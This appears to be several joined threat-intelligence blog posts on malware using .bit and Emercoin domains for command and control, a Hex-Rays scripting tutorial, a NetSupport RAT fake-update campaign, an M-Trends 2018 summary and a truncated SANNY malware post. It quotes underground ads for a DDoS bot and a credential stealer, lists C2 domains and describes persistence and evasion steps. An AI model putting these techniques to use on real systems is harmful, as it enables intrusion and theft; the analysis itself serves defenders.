I'm looking forward to hearing any ideas / comments/ questions you have about improving this DDoS bot.
I updated and enhanced the bot using your previous comments and requests (changed communication model between server and bot, etc)

I added the following features/options/abilities:

- to customize the HTTP-headers (user-agent, cookie, referrer)
- to set task limits
- to count the number of bots used for particular task
- to read the answer from a server
- to use async sockets
- to set the number of sockets per timeout
- to set the number of HTTP-requests per socket
- to set custom waiting time
- to set an attack restart periods
- to count the requests per second for particular task

I removed the feature related to DDoS attacks against TOR sites because of its improper functioning and AV detects.

Currently I am working on .bit domains support.

The price: $400
 

Figure 6: Discomrade advertising Coala DDoS malware support for .bit domains

Sample Advertisement #3

The AZORult malware, which was discovered in mid-2016, is offered in underground marketplaces by the actor "CrydBrox." In early 2017, CrydBrox offered an updated variant of the AZORult malware that included .bit support (Figure 7).

Advertisement Translated Text:

 AZORult V2

[+] added .bit domains support
[+] added CC stealing feature (for Chrome-based browsers)
[+] added passwords grabbing from FTP-client WinSCP
[+] added passwords grabbing from Outlook (up to the last version)
[+] fixed passwords grabbing from Firefox and Thunderbird
[+] added the feature to examine what privileges were used to run stealer
[+] provided encrypted communication between management panel and the stealer
[+] added AntiVirtualMachine, AntiSandbox, AntiDebug techniques
[+] fixed logs collection feature (excluded info about file operations)
[+] accelerated the work of stealer process
[+] removed .tls section from binary file
[+] added ability to search logs by cookies content (in management panel)
[+] added the view of the numbers of passwords/CC/CoinsWallet and files in logs to management panel
[+] added the commenting feature to logs
[+] added viewing of the stats by country, architecture, system version, privileges, collected passwords
[+] added new filters and improved of old filters

There are 4 variants of the stealer:
AU2_EXE.exe - run and send the report
AU2_EXEsd.exe - run, send the report and remove itself
AU2_DLL.dll - collect info after the load into the process, send data and return the control to the process
AU2_DLLT.dll - after the loading of the DLL into the process it creates the separate thread for stealer work
*DLL versions successfully work with all popular bots.
The size – 495 KB, packed with UPX – 220 KB

The prices:
1 build - $100
rebuild - $30
 

Figure 7: CrydBrox advertising AZORult support for .bit domains

Namecoin Usage Analysis

Coinciding with malicious actors' increasing interest in using .bit domains is a growing number of malware families that are being configured to use them. Malware families that we have observed using Namecoin domains as part of their C2 infrastructure include:

  • Necurs
  • AZORult
  • Neutrino (aka Kasidet, MWZLesson)
  • Corebot
  • SNATCH
  • Coala DDoS
  • CHESSYLITE
  • Emotet
  • Terdot
  • Gandcrab Ransomware
  • SmokeLoader (aka Dofoil)

Based on our analysis of samples configured to use .bit, malware families commonly connect to these domains using one of the following methods (a minimal resolution sketch follows this list):

  • Query hard-coded OpenNIC IP address(es)
  • Query hard-coded DNS server(s)
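
The same resolution flow is easy to reproduce for triage. The following Python sketch (using the third-party dnspython 2.x package) asks a short list of OpenNIC resolvers for a .bit name, falling back through the list in order the way these samples do; the domain used here is purely illustrative:

import dns.resolver  # third-party "dnspython" package

# A few of the OpenNIC resolver IPs seen hard-coded in the samples below.
OPENNIC_RESOLVERS = ["185.121.177.177", "185.121.177.53", "193.183.98.154"]

def resolve_bit(domain):
    for server in OPENNIC_RESOLVERS:
        resolver = dns.resolver.Resolver(configure=False)
        resolver.nameservers = [server]
        resolver.lifetime = 5
        try:
            answer = resolver.resolve(domain, "A")
            return [rr.address for rr in answer]
        except Exception:
            continue  # try the next resolver, as the malware does
    return []

print(resolve_bit("example.bit"))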

AZORult

The AZORult sample (MD5: 3a3f739fceeedc38544f2c4b699674c5) was configured to support the use of .bit communications, although it did not connect to a Namecoin domain during analysis. The sample first checks if the command and control (C2) domain contains the string ".bit" and, if so, the malware will query the following hard-coded OpenNIC IP addresses to try to resolve the domain (Figure 8 and Figure 9):

  • 89.18.27.34
  • 87.98.175.85
  • 185.121.177.53
  • 193.183.98.154
  • 185.121.177.177
  • 5.9.49.12
  • 62.113.203.99
  • 130.255.73.90
  • 5.135.183.146
  • 188.165.200.156


Figure 8: Hard-coded OpenNIC IP addresses - AZORult


Figure 9: AZORult code for resolving C&C domains

CHESSYLITE

The analyzed CHESSYLITE sample (MD5: ECEA3030CCE05B23301B3F2DE2680ABD) contains the following hard-coded .bit domains:

  • Leomoon[.]bit
  • lookstat[.]bit
  • sysmonitor[.]bit
  • volstat[.]bit
  • xoonday[.]bit

The malware attempts to resolve those domains by querying the following list of hard-coded OpenNIC IP addresses:

  • 69.164.196.21
  • 107.150.40.234
  • 89.18.27.34
  • 193.183.98.154
  • 185.97.7.7
  • 162.211.64.20
  • 217.12.210.54
  • 51.255.167.0
  • 91.121.155.13
  • 87.98.175.85

Once the .bit domain has been resolved, the malware will issue an encoded beacon to the server (Figure 10).


Figure 10: CHESSYLITE sample connecting to xoonday.bit and issuing beacon

Neutrino (aka Kasidet, MWZLesson)

The analyzed Neutrino sample (MD5: C102389F7A4121B09C9ACDB0155B8F70) contains the following hard-coded Namecoin C2 domain:

  • brownsloboz[.]bit

Instead of using hard-coded OpenNIC IP addresses to resolve its C2 domain, the sample issues DnsQuery_A API calls to the following DNS servers:

  • 8.8.8.8
  • sourpuss[.]net
  • ns1.opennameserver[.]org
  • freya.stelas[.]de
  • ns.dotbit[.]me
  • ns1.moderntld[.]com
  • ns1.rodgerbruce[.]com
  • ns14.ns.ph2network[.]org
  • newton.bambusoft[.]mx
  • secondary.server.edv-froehlich[.]de
  • philipostendorf[.]de
  • a.dnspod[.]com
  • b.dnspod[.]com
  • c.dnspod[.]com

The malware is configured to run through the list in the aforementioned order. Hence, if a DnsQuery_A call to 8.8.8.8 fails, the malware will try sourpuss[.]net, and so on (Figure 11). Through network emulation techniques, we simulated a resolved connection in order to observe the sample's behavior with the .bit domain.


Figure 11: Modified 8.8.8.8 to 8.8.8.5 to force query failure

Monero Miner

The analyzed Monero cryptocurrency miner (MD5: FA1937B188CBB7fD371984010564DB6E) revealed the use of .bit for initial beacon communications. This miner uses the DnsQuery_A API call and connects to the OpenNIC IP address 185.121.177.177 to resolve the domain flashupd[.]bit (Figure 12 and Figure 13).


Figure 12: Code snippet for resolving the .bit domain


Figure 13: DNS request to OpenNIC IP 185.121.177.177

Terdot (aka ZLoader, DELoader)

The analyzed Terdot sample (MD5: 347c574f7d07998e321f3d35a533bd99) includes the ability to communicate with .bit domains, seemingly to download additional payloads. It attempts resolution by querying the following list of OpenNIC and public DNS IP addresses:

  • 185.121.177.53
  • 185.121.177.177
  • 45.63.25.55
  • 111.67.16.202
  • 142.4.204.111
  • 142.4.205.47
  • 31.3.135.232
  • 62.113.203.55
  • 37.228.151.133
  • 144.76.133.38

This sample iterates through the hard-coded IPs in attempts to access the domain cyber7[.]bit (Figure 14). If the domain resolves, it will connect to https://cyber7[.]bit/blog/ajax.php to download data that is RC4 encrypted and expected to contain a PE file.


Figure 14: DNS requests for cyber7.bit domain

Gandcrab Ransomware

The analyzed Gandcrab ransomware sample (MD5: 9abe40bc867d1094c7c0551ab0a28210) also revealed the use of .bit domains. Unlike previously mentioned families, it spawns a new nslookup process via an anonymous pipe to resolve the following blockchain domains:

  • Bleepingcomputer[.]bit
  • Nomoreransom[.]bit
  • esetnod32[.]bit
  • emsisoft[.]bit
  • gandcrab[.]bit

The spawned nslookup process contains the following command (as seen in Figure 15):

  • nslookup <domain>  a.dnspod.com


Figure 15: GandCrab nslookup process creation and command
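
The same lookup is trivial to reproduce when verifying the DNS path in a lab. The Python sketch below delegates the query to a child nslookup process and reads its output back over a pipe, mirroring the anonymous-pipe approach GandCrab uses; the domain is one of the hard-coded names listed above:

import subprocess

def nslookup_via_dnspod(domain):
    # Spawn "nslookup <domain> a.dnspod.com" and capture its output.
    result = subprocess.run(
        ["nslookup", domain, "a.dnspod.com"],
        capture_output=True, text=True, timeout=15,
    )
    return result.stdout

print(nslookup_via_dnspod("gandcrab.bit"))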

Emercoin Domains

FireEye iSIGHT Intelligence researchers have identified other blockchain domains being used by cyber criminals, including Emercoin domains .bazar and .coin. Similar to the Namecoin TLD, all records are completely decentralized and cannot be censored, altered, revoked, or suspended.

Navigating to Emercoin Domains

Emercoin also maintains a peering agreement with OpenNIC, meaning domains registered with Emercoin's EMCDNS service are accessible to all users of OpenNIC DNS servers. Current root zones supported by EMCDNS are shown in Table 3.

Zone      Intended Purpose
.coin     digital currency and commerce websites
.emc      websites associated with the Emercoin project
.lib      from the words Library and Liberty - that is, knowledge and freedom
.bazar    marketplace

Table 3: Emercoin-supported DNS zones (Emercoin Wiki)

Users also have the option of installing compatible browser plugins that will navigate to Emercoin domains, or routing their traffic through emergate[.]net, which is a gateway maintained by the Emercoin developers.

Emercoin Domain Usage

FireEye iSIGHT Intelligence has observed eCrime actors using Emercoin domains for malicious infrastructure, albeit to a lesser extent. Examples of these operations include:

  • Operators of Joker's Stash, a prolific and well-known card data shop, frequently change the site's URL. Recently, they opted for using a blockchain domain (jstash[.]bazar) instead of Tor, ostensibly for greater operational security.
  • Similarly, the following card shops have also moved to .bazar domains:
    • buybest[.]bazar
    • FRESHSTUFF[.]bazar
    • swipe[.]bazar
    • goodshop[.]bazar
    • easydeals[.]bazar
  • In addition to the hard-coded Namecoin domain, the aforementioned Neutrino sample also contained several hard-coded Emercoin domains:
    • http://brownsloboz[.]bazar
    • http://brownsloboz[.]lib
    • http://brownsloboz[.]emc
  • FireEye iSIGHT Intelligence identified a Gandcrab ransomware sample (MD5: a0259e95e9b3fd7f787134ab2f31ad3c) that leveraged the Emercoin TLD .coin for its C2 communications (Figure 16 and Figure 17).


Figure 16: DNS query for nomoreransom[.]coin


Figure 17: Gandcrab POST request to nomoreransom[.]coin

Outlook

While traditional methods of infrastructure obfuscation such as Tor, bulletproof, and fast-flux hosting will most likely continue to be used for the foreseeable future, we assess that the use of blockchain domains for malicious infrastructure will continue to gain popularity among cyber criminals worldwide. Coinciding with the expected increase in demand, there will likely be an increasing number of malicious infrastructure offerings within underground communities that support blockchain domains.

Due to the decentralized and replicated nature of a blockchain, law enforcement takedowns of a malicious domain would likely require that the entire blockchain be shut down – something that is unfeasible because many legitimate services run on these blockchains. If law enforcement agencies can identify the individual(s) managing specific malicious blockchain domains, takedowns could still be possible; however, the likelihood of this heavily depends on the operational security maintained by the eCrime actors. Further, as cyber criminals continue to develop methods of infrastructure obfuscation and protection, blockchain domain takedowns will continue to prove difficult.

Solving Ad-hoc Problems with Hex-Rays API

Introduction

IDA Pro is the de facto standard when it comes to binary reverse engineering. Besides being a great disassembler and debugger, it is possible to extend it and include a powerful decompiler by purchasing an additional license from Hex-Rays. The ability to switch between disassembled and decompiled code can greatly reduce the analysis time.

The decompiler (from now on referred to as Hex-Rays) has been around for a long time and has achieved a good level of maturity. However, there seems to be a lack of concise and complete resources regarding this topic (tutorials or otherwise). In this blog post, we aim to close that gap by showcasing examples where scripting Hex-Rays goes a long way.

Overview of a Decompiler

In order to understand how the decompiler works, it’s helpful to first review the normal compilation process.

Compilation and decompilation center around the concept of an Abstract Syntax Tree (AST). In essence, a compiler takes the source code, splits it into tokens according to a grammar, then these tokens are grouped into logical expressions. In this phase of the compilation process, referred to as parsing, the code structure is represented as a complex object, the AST. From the AST, the compiler will produce assembly code for the specified platform.

A decompiler takes the opposite route. From the given assembly code, it works back to produce an AST, and from this to produce pseudocode.

Of all the intermediate steps between source code and assembly, we stress the AST because most of the time you spend using the Hex-Rays API will actually be spent reading and/or modifying the Abstract Syntax Tree (or ctree, in Hex-Rays terminology).

Items, Expressions and Statements

Now we know that Hex-Rays’s ctree is a tree-like data structure. The nodes of this tree are either of type cinsn_t or cexpr_t. We will define these in a moment, but for now it is important to know that both derive from a very basic type: citem_t.

Therefore, all nodes in the ctree will have the op property, which indicates the node type (variable, number, logical expression, etc.).

The type of op (ctype_t) is an enumeration where all constants are named either cit_<xyz> (for statements) or cot_<xyz> (for expressions). Keep this in mind, as it will be very important. A quick way to inspect all ctype_t constants and their values is to execute the following code snippet:
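
The snippet itself is not reproduced in this archive; a minimal IDAPython equivalent, using the ida_hexrays module, is:

import ida_hexrays

# Print every ctree node type constant (cit_* statements, cot_* expressions)
# together with its numeric value.
for name in sorted(dir(ida_hexrays)):
    if name.startswith("cit_") or name.startswith("cot_"):
        print("%-22s %d" % (name, getattr(ida_hexrays, name)))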

Running it prints every cit_ and cot_ constant alongside its numeric value.

Let’s dive a bit deeper and explain the two types of nodes: expressions and statements.

It is useful to think about expressions as the “little logical elements” of your code. They range from simple types such as variables, strings or numerical constants, to small code constructs (assignments, comparisons, additions, logical operations, array indexing, etc.).

These are of type cexpr_t, a large structure containing several members. The members that can be accessed depend on its op value. For example, the member n, which holds the numeric value, only makes sense when dealing with constants.

On the other side, we have statements. These correlate roughly to language keywords (if, for, do, while, return, etc.). Most of them are related to control flow and can be thought of as “the big picture elements” of your code.

Recapitulating, we have seen how the decompiler exposes this tree-like structure (the ctree), which consists of two types of nodes: expressions and statements. In order to extract information from or modify the decompiled code, we have to interact with the ctree nodes via methods dependent on the node type. However, the following question arises: “How do we reach the nodes?”

This is done via a class exposed by Hex-Rays: the tree visitor (ctree_visitor_t). This class has two virtual methods, visit_insn and visit_expr, that are executed when a statement or expression is found while traversing the ctree. We can create our own visitor classes by inheriting from this one and overloading the corresponding methods.
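
A bare-bones visitor, then, looks something like the following IDAPython sketch, which decompiles the function under the cursor and prints the op value of every expression it contains:

import ida_hexrays
import ida_kernwin

class MyVisitor(ida_hexrays.ctree_visitor_t):
    def __init__(self):
        ida_hexrays.ctree_visitor_t.__init__(self, ida_hexrays.CV_FAST)

    def visit_expr(self, expr):
        # expr.op tells us which cot_* expression this node is.
        print("expression op=%d at 0x%x" % (expr.op, expr.ea))
        return 0  # 0 = continue the traversal

cfunc = ida_hexrays.decompile(ida_kernwin.get_screen_ea())
if cfunc:
    MyVisitor().apply_to(cfunc.body, None)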

Example Scripts

In this section, we will use the Hex-Rays API to solve two real-world problems:

  • Identify calls to GetProcAddress to dynamically resolve Windows APIs, assigning the resulting address to a global variable.
  • Display assignments related to stack strings as characters instead of numbers, for easier readability.

GetProcAddress

The first example we will walk through is how to automatically handle renaming global variables that have been dynamically resolved at run time. This is a common technique malware uses to hide its capabilities from static analysis tools. An example of dynamically resolving global variables using GetProcAddress is shown in Figure 1.


Figure 1: Dynamic API resolution using GetProcAddress

There are several ways to rename the global variables, with the simplest being manual copy and paste. However, this task is very repetitive and can be scripted using the Hex-Rays API.

In order to write any Hex-Rays script, it is important to first visualize the ctree. The Hex-Rays SDK includes a sample, sample5, which can be used to view the current function’s ctree. The amount of data shown in a ctree for a function can be overwhelming. A modified version of the sample was used to produce a picture of a sub-ctree for the function shown in Figure 1. The sub-ctree for the single expression: 'dword_1000B2D8 = (int)GetProcAddress(v0, "CreateThread");' is shown in Figure 2.


Figure 2: Sub-ctree for GetProcAddress assignment

With knowledge of the sub-ctree in use, we can write a script to automatically rename all the global variables that are being assigned using this method.

The code to automatically rename all the global variables is shown in Figure 3. The code works by traversing the ctree looking for calls to the GetProcAddress function. Once found, the code takes the name of the function being resolved and finds the global variable that is being set. The code then uses the IDA MakeName API to rename the address to the correct function.


Figure 3: Function renaming global variables
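
Because the figure contents are not reproduced here, the following IDAPython sketch restates the described logic; it is an approximation of the approach, not the original FLARE script, and uses ida_name.set_name as the modern equivalent of MakeName:

import ida_bytes
import ida_hexrays
import ida_kernwin
import ida_name
import ida_nalt

def _string_arg(arg):
    # Best-effort extraction of a string literal argument.
    if arg.op == ida_hexrays.cot_str:
        return arg.string
    if arg.op == ida_hexrays.cot_obj:
        raw = ida_bytes.get_strlit_contents(arg.obj_ea, -1, ida_nalt.STRTYPE_C)
        return raw.decode() if raw else None
    return None

class RenameDynamicImports(ida_hexrays.ctree_visitor_t):
    # Find  global = (cast) GetProcAddress(h, "Name")  and rename the global.
    def __init__(self):
        ida_hexrays.ctree_visitor_t.__init__(self, ida_hexrays.CV_FAST)

    def visit_expr(self, e):
        if e.op != ida_hexrays.cot_asg or e.x.op != ida_hexrays.cot_obj:
            return 0
        call = e.y.x if e.y.op == ida_hexrays.cot_cast else e.y  # skip the cast
        if call.op != ida_hexrays.cot_call or call.x.op != ida_hexrays.cot_obj:
            return 0
        if "GetProcAddress" not in ida_name.get_name(call.x.obj_ea):
            return 0
        if len(call.a) == 2:
            api_name = _string_arg(call.a[1])
            if api_name:
                ida_name.set_name(e.x.obj_ea, api_name, ida_name.SN_NOCHECK)
        return 0

cfunc = ida_hexrays.decompile(ida_kernwin.get_screen_ea())
if cfunc:
    RenameDynamicImports().apply_to(cfunc.body, None)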

After the script has been executed, we can see in Figure 4 that all the global variables have been renamed to the appropriate function name.


Figure 4: Global variables renamed

Stack Strings

Our next example is a typical issue when dealing with malware: stack strings. This is a technique aimed at making analysis harder by using arrays of characters instead of strings in the code. An example can be seen in Figure 5; the malware stores each character’s ASCII value on the stack and then references it in the call to sprintf. At first glance, it is very difficult to tell what this string means (unless, of course, you know the ASCII table by heart).


Figure 5: Hex-Rays decompiler output. Stack strings are difficult to read.

Our script will modify these assignments to something more readable. The important part of our code is the ctree visitor mentioned earlier, which is shown in Figure 6.


Figure 6: Custom ctree visitor

The logic implemented here is pretty straightforward. We define our subclass of a ctree visitor (line 1) and override its visit_expr method. This will only kick in when an assignment is found (line 9). Another condition to be met is that the left side of the assignment is a variable and the right side a number (line 15). Moreover, the numeric value must be in the readable ASCII range (lines 20 and 21).

Once this kind of expression is found, we will change the type of the right side from a number to a string (lines 26 to 31), and replace its numerical value by the corresponding ASCII character (line 32).
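
The following IDAPython sketch covers only the detection half of this logic: it flags assignments of a printable ASCII constant to a local variable and prints the recovered characters. The original script goes one step further and rewrites the ctree node so the pseudocode itself displays the character.

import ida_hexrays
import ida_kernwin

class StackStringFinder(ida_hexrays.ctree_visitor_t):
    def __init__(self):
        ida_hexrays.ctree_visitor_t.__init__(self, ida_hexrays.CV_FAST)
        self.chars = []

    def visit_expr(self, e):
        # variable = <number>  where the number is printable ASCII
        if (e.op == ida_hexrays.cot_asg
                and e.x.op == ida_hexrays.cot_var
                and e.y.op == ida_hexrays.cot_num):
            value = e.y.numval()
            if 0x20 <= value <= 0x7E:
                self.chars.append((e.ea, chr(value)))
        return 0

cfunc = ida_hexrays.decompile(ida_kernwin.get_screen_ea())
if cfunc:
    finder = StackStringFinder()
    finder.apply_to(cfunc.body, None)
    for ea, ch in finder.chars:
        print("0x%x: %r" % (ea, ch))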

The modified pseudocode after running this script is shown in Figure 7.


Figure 7: Assigned values shown as characters

You can find the complete scripts in our FLARE GitHub repository under decompiler scripts.

Conclusion

These two admittedly simple examples should give you an idea of the power of IDA’s decompiler API. In this post we have covered the foundations of all decompiler scripts: the ctree object, a structure composed of expressions and statements that represents every element of the code, as well as the relationships between them. By creating a custom visitor we have shown how to traverse the tree and read or modify the code elements, thereby analyzing or modifying the pseudocode.

Hopefully, this post will motivate you to start writing your own scripts. This is only the beginning!

Do you want to learn more about these tools and techniques from FLARE? Then you should take one of our Black Hat classes in Las Vegas this summer! Our offerings include Malware Analysis Crash Course, macOS Malware for Reverse Engineers, and Malware Analysis Master Class.

References

Although written in 2009, one of the best references is still the original article on the Hex-Rays blog.

Fake Software Update Abuses NetSupport Remote Access Tool

Over the last few months, FireEye has tracked an in-the-wild campaign that leverages compromised sites to spread fake updates. In some cases, the payload was the NetSupport Manager remote access tool (RAT). NetSupport Manager is a commercially available RAT that can be used legitimately by system administrators for remotely accessing client computers. However, malicious actors are abusing this application by installing it to the victims’ systems without their knowledge to gain unauthorized access to their machines. This blog details our analysis of the JavaScript and components used in instances where the identified payload was NetSupport RAT.

Infection Vector

The operator behind these campaigns uses compromised sites to spread fake updates masquerading as Adobe Flash, Chrome, and Firefox updates. When users navigate to the compromised website, the malicious JavaScript file is downloaded, mostly from a Dropbox link. Before delivering the payload, the JavaScript sends basic system information to the server. After receiving further commands from the server, it then executes the final JavaScript to deliver the final payload. In our case, the JavaScript that delivers the payload is named Update.js, and it is executed from %AppData% with the help of wscript.exe. Figure 1 shows the infection flow.


Figure 1: Infection Flow

In-Depth Analysis of JavaScript

The initial JavaScript file contains multiple layers of obfuscation. Like other malicious scripts, the first layer has obfuscation that builds and executes the second layer as a new function. The second layer of the JavaScript contains the dec function, which is used to decrypt and execute more JavaScript code. Figure 2 shows a snapshot of the second layer.


Figure 2: Second Layer of Initial JavaScript File

In the second JavaScript file, the malware author uses a tricky method to make analysis harder for reverse engineers: the caller and callee function code is used to derive the decryption key. During normal JavaScript analysis, an analyst who finds an obfuscated script will typically try to de-obfuscate or beautify it. JavaScript beautification tools generally add line breaks and tabs to make the script code easier to read. The tools also try to rename the local variables and remove unreferenced variables and code from the script, which helps the analyst focus on the core code.

But in this case, since the malware uses the caller and callee function code to derive the key, if the analyst adds or removes anything from the first or second layer script, the script will not be able to retrieve the key and will terminate with an exception. The code snippet in Figure 3 shows this trick.


Figure 3: Anti-Analysis Trick Implemented in JavaScript (Beautified Code)

The code decrypts and executes the JavaScript code as a function. This decrypted function contains code that initiates the network connection. In the decoded function, the command and control (C2) URL and a value named tid are hard-coded in the script and obscured by an encoding function.

During its first communication to the server, the malware sends the tid value and the current date of the system in encoded format, and waits for the response from the server. It decodes the server response and executes the response as a function, as shown in Figure 4.


Figure 4: Initial Server Communication and Response

The response from the server is JavaScript code that the malware executes as a function named step2.

The step2 function uses WScript.Network and Windows Management Instrumentation (WMI) to collect the following system information, which it then encodes and sends to the server:

Architecture, ComputerName, UserName, Processors, OS, Domain, Manufacturer, Model, BIOS_Version, AntiSpywareProduct, AntiVirusProduct, MACAddress, Keyboard, PointingDevice, DisplayControllerConfiguration, ProcessList;

After sending the system information to the server, the response from the server contains two parts: content2 and content3.

The script (step2 function) decodes both parts. The decoded content3 part contains a function named step3, as shown in Figure 5.


Figure 5: Decrypting and Executing Response step3

The step3 function contains code that writes decoded content2 into a %temp% directory as Update.js. Update.js contains code to download and execute the final payload. The step3 function also sends the resulting data, such as runFileResult and _tempFilePath, to the server, as shown in Figure 6.


Figure 6: Script to Drop and Execute Update.js

The Update.js file also contains multi-layer obfuscation. After decoding, the JavaScript contains code to drop multiple files in %AppData%, including a 7zip standalone executable (7za.exe), password-protected archive (Loglist.rtf), and batch script (Upd.cmd). We will talk more about these components later.

The JavaScript uses PowerShell commands to download the files from the server. It sets the execution policy to Bypass and the window style to Hidden to conceal its activity from the end user.

Components of the Attack

Figure 7 shows the index of the malicious server where we have observed the malware author updating the script content.


Figure 7: Index of Malicious Server

  • 7za.exe: 7zip standalone executable
  • LogList.rtf: Password-protected archive file
  • Upd.cmd: Batch script to install the NetSupport Client
  • Downloads.txt: List of IPs (possibly the infected systems)
  • Get.php: Downloads LogList.rtf

Upd.cmd

This file is a batch script that extracts the archive file and installs the remote control tool on the system. The script is obfuscated with the variable substitution method. This file was regularly updated by the malware author during our analysis.

After de-obfuscating the script, we can see the batch commands in the script (Figure 8).


Figure 8: De-Obfuscated Upd.cmd Script

The script performs the following tasks:

  1. Extract the archive using the 7zip executable with the password mentioned in the script.
  2. After extraction, delete the downloaded archive file (loglist.rtf).
  3. Disable Windows Error Reporting and App Compatibility.
  4. Add the remote control client executable to the firewall’s allowed program list.
  5. Run remote control tool (client32.exe).
  6. Add a Run registry entry with the name “ManifestStore” or download a shortcut file to the Startup folder.
  7. Hide the files using attributes.
  8. Delete all the artifacts (7zip executable, script, archive file).

Note: While analyzing the script, we found some typos in it (Figure 9). Yes, malware authors make mistakes too. This script might be in a beta phase; in later versions, the author removed these typos.


Figure 9: Registry Entry Bloopers

Artifact Cleaning

As mentioned, the script contains code to remove the artifacts used in the attack from the victim’s system. While monitoring the server, we also observed some change in the script related to this code, as shown in Figure 10.


Figure 10: Artifact Cleaning Commands

The highlighted command in one of the variants indicates that it might drop or use this file in the attack. The file could be a decoy document.

Persistence Mechanism

During our analysis, we observed two variants of this attack with different persistence mechanisms.

In the first variant, the malware author uses a Run registry entry to remain persistent on the system.

In the second variant, the malware author uses the shortcut file (named desktop.ini.lnk), which is hosted on the server. It downloads the shortcut file and places it into the Startup folder, as shown in Figure 11.


Figure 11: Downloading Shortcut File

The shortcut’s target command points to the remote control application “client32.exe,” dropped in %AppData%, so that the application starts at startup.

LogList.rtf

Although the file extension is .rtf, the file is actually a 7zipped archive. This archive file is password-protected and contains the NetSupport Manager RAT. The script upd.cmd contains the password to extract the archive.

The major features provided by the NetSupport tool include:

  • Remote desktop
  • File transfer
  • Remote inventory and system information
  • Launching applications on the client’s machine
  • Geolocation

Downloads.txt

This file contains a list of IP addresses, which could be compromised systems. It lists IPs along with User-Agent strings. The IP addresses in the file belong to various regions, mostly the U.S., Germany, and the Netherlands.

Conclusion

RATs are widely used for legitimate purposes, often by system administrators. However, because they are legitimate and readily available applications, malware authors can easily abuse them and sometimes avoid user suspicion as well.

The FireEye HX Endpoint platform successfully detects this attack at the initial phase of the attack cycle.

Acknowledgement

Thanks to my colleagues Dileep Kumar Jallepalli, Rakesh Sharma and Kimberly Goody for their help in the analysis.

Indicators of Compromise

Registry entries

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run :  ManifestStore

HKCU\Software\SeX\KEx

Files

%AppData%\ManifestStore\client32.exe

%AppData%\ManifestStore\client32.ini

%AppData%\ManifestStore\HTCTL32.DLL

%AppData%\ManifestStore\msvcr100.dll

%AppData%\ManifestStore\nskbfltr.inf

%AppData%\ManifestStore\NSM.ini

%AppData%\ManifestStore\NSM.LIC

%AppData%\ManifestStore\nsm_vpro.ini

%AppData%\ManifestStore\pcicapi.dll

%AppData%\ManifestStore\PCICHEK.DLL

%AppData%\ManifestStore\PCICL32.DLL

%AppData%\ManifestStore\remcmdstub.exe

%AppData%\ManifestStore\TCCTL32.DLL

%AppData%\systemupdate\Whitepaper.docx

Shortcut file

            %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.lnk

Firewall program entry allowing the following application

            %AppData%\ManifestStore\client32.exe

Running process named “client32.exe” from the path “%AppData%\ManifestStore\client32.exe”

Hashes

The following hashes are JavaScript files that use the same obfuscation techniques described in the blog:

fc87951ae927d0fe5eb14027d43b1fc3

e3b0fd6c3c97355b7187c639ad9fb97a

a8e8b2072cbdf41f62e870ec775cb246

6c5fd3258f6eb2a7beaf1c69ee121b9f

31e7e9db74525b255f646baf2583c419

065ed6e04277925dcd6e0ff72c07b65a

12dd86b842a4d3fe067cdb38c3ef089a

350ae71bc3d9f0c1d7377fb4e737d2a4

c749321f56fce04ad8f4c3c31c7f33ff

c7abd2c0b7fd8c19e08fe2a228b021b9

b624735e02b49cfdd78df7542bf8e779

5a082bb45dbab012f17120135856c2fc

dc4bb711580e6b2fafa32353541a3f65

e57e4727100be6f3d243ae08011a18ae

9bf55bf8c2f4072883e01254cba973e6

20a6aa24e5586375c77b4dc1e00716f2

aa2a195d0581a78e01e62beabb03f5f0

99c7a56ba04c435372bea5484861cbf3

8c0d17d472589df4f597002d8f2ba487

227c634e563f256f396b4071ffda2e05

ef315aa749e2e33fc6df09d10ae6745d

341148a5ef714cf6cd98eb0801f07a01

M-Trends 2018

What have incident responders observed and learned from cyber attacks in 2017? Just as in prior years, we have continued to see the cyber security threat landscape evolve. Over the past twelve months we have observed a number of new trends and changes to attacks, but we have also seen how certain trends and predictions from the past have been confirmed or even reconfirmed.

Our 9th edition of M-Trends draws upon the findings of one year of incident response investigations across the globe. This data provides us with insights into the evolution of nation-state sponsored threat actors, new threat groups, and new trends and attacker techniques we have observed during our investigations. We also compare this data to past observations from prior M-Trends reports and continue our tradition of reporting on key metrics and their development over time.

Some of the topics we cover in the 2018 M-Trends report include:

  • How the global median time from compromise to internal discovery has dropped from 80 days in 2016 to 57.5 in 2017.
  • The increase of attacks originating from threat actors sponsored by Iran.
  • Metrics about attacks that have retargeted or even recompromised prior victim organizations, a topic we previously discussed in our 2013 edition of M-Trends.
  • The widening cyber security skills gap and the rising demand for skilled personnel capable of meeting the challenges posed by today’s more sophisticated threat actors.
  • Frequently observed areas of weaknesses in security programs and their relation to security incidents.
  • Observations and lessons we have learned from our red teaming exercises about the effectiveness and gaps of common security controls.

By sharing this report with the security community, we continue our tradition of providing security professionals with insights and knowledge gained from recent breaches. We hope that you find this report useful in your work to strengthen your security posture and defend against ever-evolving threats.

SANNY Malware Delivery Method Updated in Recently Observed Attacks

Introduction

In the third week of March 2018, through FireEye’s Dynamic Threat Intelligence, FireEye discovered malicious macro-based Microsoft Word documents distributing SANNY malware to multiple governments worldwide. Each malicious document lure was crafted in regard to relevant regional geopolitical issues. FireEye has tracked the SANNY malware family since 2012 and believes that it is unique to a group focused on Korean Peninsula issues. This group has consistently targeted diplomatic entities worldwide, primarily using lure documents written in English and Russian.

As part of these recently observed attacks, the threat actor has made significant changes to their usual malware delivery method. The attack is now carried out in multiple stages, with each stage being downloaded from the attacker’s server. Command line evasion techniques, the capability to infect systems running Windows 10, and use of recent User Account Control (UAC) bypass techniques have also been added.

Document Details

The following two documents, detailed below, have been observed in the latest round of attacks:

MD5 hash: c538b2b2628bba25d68ad601e00ad150
SHA256 hash: b0f30741a2449f4d8d5ffe4b029a6d3959775818bf2e85bab7fea29bd5acafa4
Original Filename: РГНФ 2018-2019.doc

The document shown in Figure 1 discusses Eurasian geopolitics as they relate to China, as well as Russia’s security.


Figure 1: Sample document written in Russian

MD5 hash: 7b0f14d8cd370625aeb8a6af66af28ac
SHA256 hash: e29fad201feba8bd9385893d3c3db42bba094483a51d17e0217ceb7d3a7c08f1
Original Filename: Copy of communication from Security Council Committee (1718).doc

The document shown in Figure 2 discusses sanctions on humanitarian operations in the Democratic People’s Republic of Korea (DPRK).


Figure 2: Sample document written in English

Macro Analysis

In both documents, an embedded macro stores the malicious command line to be executed in the TextBox property (TextBox1.Text) of the document. This TextBox property is first accessed by the macro to execute the command on the system and is then overwritten to delete evidence of the command line.

Stage 1: BAT File Download

